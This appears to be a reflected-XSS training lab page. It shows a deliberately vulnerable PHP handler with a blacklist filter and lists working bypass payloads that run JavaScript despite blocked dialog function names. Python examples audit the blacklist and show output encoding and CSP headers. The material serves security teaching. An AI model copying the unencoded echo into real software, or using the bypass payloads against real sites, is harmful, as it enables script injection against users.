Reflected XSS Bootcamp

Complete Challenge: Total Function Filter Bypass

Complete Function Filter Challenge

Lab Overview

This is the ultimate function filtering challenge! The filter now blocks ALL three common dialog functions: 'alert', 'confirm', and 'prompt', along with multiple HTML tags.

Complete Function Blocking: The filter now blocks 'prompt' in addition to 'alert' and 'confirm', closing the last major dialog function vector!
Complete Function Filter: Blocks 12 case variations of 'script' plus 'img', 'image', 'audio', 'video', 'body', 'alert', 'confirm', and 'prompt'
Blocked tags and functions: script, Script, sCript, scRipt, scrIpt, scriPt, scripT, SCript, SCRipt, SCRIpt, SCRIPt, SCRIPT, img, image, audio, video, body, alert, confirm, prompt
Filter method: str_replace(array('script','Script',...,'alert','confirm','prompt'), '', $_GET['lname'])
Filter Complexity: Complete Function-Level Filtering

Objective: Bypass the complete function filter and execute JavaScript code, even though all dialog functions are blocked.

Note: Only the Last Name field is filtered and displayed. The First Name field is unfiltered but not used in output.

Backend Source Code
<?php
// Lab handler (deliberately vulnerable): a blacklist of 20 exact strings is stripped
// from lname in a single, non-recursive str_replace pass, and the result is echoed
// into the page without any output encoding.
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    $arr = array('script','Script','sCript','scRipt',
                'scrIpt','scriPt','scripT','SCript',
                'SCRipt','SCRIpt','SCRIPt','SCRIPT',
                'img','image','alert','confirm','prompt',
                'audio','video','body');
    $re = str_replace($arr, '', $_GET['lname']);   // case-sensitive, one pass per needle, in array order
    echo $re;                                       // reflected unencoded
}
Test Input Form
  • First Name (fname): no filters, but not displayed in the output
  • Last Name (lname): 20 filters, including ALL dialog functions blocked; this is the field that is reflected
Ultimate Function Bypass Techniques
  • Alternative output methods: Use console.log(), document.write(), document.title, location.href, or manipulate DOM elements
  • Create custom functions: Define your own alert function: function a(){window.alert(1)};a()
  • Global object reflection: Access functions through reflection: window['al'+'ert'], this['al'+'ert'], self['al'+'ert']
  • Advanced encoding: Use multiple encoding layers: HTML entities, URL encoding, Unicode, Base64
  • Dynamic evaluation: Use eval(), Function(), setTimeout(), setInterval() with encoded payloads
  • String manipulation: Build function names with concatenation, template literals, or array methods
  • Character code conversion: Use String.fromCharCode() to build any function name
  • Alternative calling patterns: Use .call(), .apply(), or indirect evaluation
  • DOM-based alternatives: Create elements, modify styles, trigger events for visible effects
  • Error-based execution: Cause JavaScript errors or use error handlers
  • Property descriptor access: Use Object.getOwnPropertyDescriptor(window,'alert').value
  • Proxy and reflection APIs: Use advanced JavaScript features for indirect execution
Security Implications

Complete function blocking demonstrates:

  • JavaScript execution cannot be prevented by blocking function names
  • The language provides infinite ways to execute code
  • Function name filtering provides a false sense of security
  • Attackers can always find alternative execution paths
  • Proper output encoding is the only reliable defense
  • Content Security Policy (CSP) is necessary for real protection
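As an added check, not part of the lab's own code, the following Python model of the handler's str_replace blacklist measures how many upper/lower-case spellings of each blocked word the list actually catches. The BLOCKED list is copied from the PHP handler above; the names lab_filter, case_variants and blacklist_coverage are chosen here.

```python
import itertools

# The 20 strings the lab's PHP handler passes to str_replace, in the same order.
BLOCKED = [
    'script', 'Script', 'sCript', 'scRipt', 'scrIpt', 'scriPt', 'scripT',
    'SCript', 'SCRipt', 'SCRIpt', 'SCRIPt', 'SCRIPT',
    'img', 'image', 'alert', 'confirm', 'prompt', 'audio', 'video', 'body',
]


def lab_filter(value: str) -> str:
    """Model of PHP str_replace(array(...), '', $value):
    one case-sensitive, non-recursive pass per needle, in array order."""
    for needle in BLOCKED:
        value = value.replace(needle, '')
    return value


def case_variants(word: str):
    """Yield every upper/lower spelling of word (2 ** len(word) of them)."""
    for bits in itertools.product((False, True), repeat=len(word)):
        yield ''.join(c.upper() if up else c for c, up in zip(word, bits))


def blacklist_coverage(word: str) -> tuple:
    """Return (variants the filter removes, variants that exist) for one blocked word.
    A variant counts as removed only if it no longer appears, case-insensitively,
    in the filtered output."""
    total = removed = 0
    for variant in case_variants(word):
        total += 1
        if variant.lower() not in lab_filter(variant).lower():
            removed += 1
    return removed, total


if __name__ == '__main__':
    # Coverage audit: how much of each word's case space does the blacklist cover?
    for word in ('script', 'alert', 'confirm', 'prompt'):
        removed, total = blacklist_coverage(word)
        print(f'{word}: {removed} of {total} case variants stripped')
```

The audit shows the exact-match list covers 12 of the 64 spellings of 'script' and only the lowercase spelling of each dialog function, which is the gap the Security Implications above describe: a list of exact strings is a coverage problem that never closes, whereas output encoding does not depend on which strings the attacker chooses.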
Enterprise Defense Strategies

For production-grade XSS prevention:

  • Implement strict Content Security Policy (CSP) headers
  • Use context-aware output encoding for all dynamic content
  • Validate input using strict whitelists, not blacklists
  • Use modern sanitization libraries (DOMPurify, etc.)
  • Implement Trusted Types for DOM XSS protection
  • Use security headers: X-Content-Type-Options: nosniff; X-XSS-Protection is a legacy header that current browsers ignore, and CSP supersedes it
  • Conduct regular security testing and code reviews
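An added example, not the lab's code, of the encoding and header items above in Python: one encoder per output context that reflected data commonly lands in, plus the response headers a hardened version of the lab handler would send. The function names (for_html_text, for_js_string, security_headers, render_lname) and the specific CSP policy are choices made here, not taken from the lab.

```python
import html
import json


def for_html_text(value: str) -> str:
    """Encode for an HTML text node or a quoted attribute value:
    <, >, &, " and ' become entities, so no tag or attribute can start."""
    return html.escape(value, quote=True)


def for_js_string(value: str) -> str:
    """Encode for a JavaScript string literal inside an inline <script> block.
    json.dumps yields a valid quoted JS string; the extra replacements keep a
    value such as </script> from closing the surrounding element, and keep
    '&' from being interpreted if the block is ever reused as an attribute."""
    return (json.dumps(value)
            .replace('<', '\\u003c')
            .replace('>', '\\u003e')
            .replace('&', '\\u0026'))


def security_headers() -> dict:
    """Response headers for the hardened handler (policy is an assumption for this example)."""
    return {
        # No inline script and no eval(): markup that slips through cannot execute.
        'Content-Security-Policy': (
            "default-src 'self'; script-src 'self'; object-src 'none'; "
            "base-uri 'none'; require-trusted-types-for 'script'"
        ),
        'X-Content-Type-Options': 'nosniff',
    }


def render_lname(lname: str) -> str:
    """Hardened equivalent of the lab's `echo $re`: the value reaches the page
    only through the text-node encoder, with no blacklist involved."""
    return '<p>Last name: ' + for_html_text(lname) + '</p>'


if __name__ == '__main__':
    sample = '<b title="x">O\'Neil & Sons</b>'   # constructed input for the demo
    print(render_lname(sample))
    print(for_js_string(sample))
    for name, value in security_headers().items():
        print(f'{name}: {value}')
```

Pick the encoder by where the value is written, not by what it contains; a value that is safe in a text node is not automatically safe inside a script block, which is why there is one function per context rather than one "sanitize" call.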
Complete Bypass Examples
Custom Function Creation:
  • function x(){window.alert(1)};x()
  • window.a=window.alert;a(1)
  • eval('window["al"+"ert"](1)')
  • setTimeout('window.alert(1)')
Alternative Output Methods:
  • console.log(1) - Browser console
  • document.title=1 - Page title
  • document.body.innerHTML=1 - Page content
  • location.href='javascript:alert(1)' - Navigation
Advanced Encoding Examples:
  • eval('\\u0061lert(1)') - Unicode escape
  • eval('al'+String.fromCharCode(101,114,116)+'(1)') - Character codes
  • Function('al'+'ert(1)')() - Function constructor
  • top['al'+'ert'](1) - Bracket notation
Mastering Function Filter Bypass
  • Level 1 - Single Function: alert
  • Level 2 - Multiple Functions: alert, confirm
  • Level 3 - Complete Blocking: alert, confirm, prompt

You've reached the ultimate function filtering challenge! This demonstrates that even when all common dialog functions are blocked, JavaScript execution remains possible through creative techniques.

Remember: Function name filtering is not a security control - proper output encoding and CSP are the real defenses.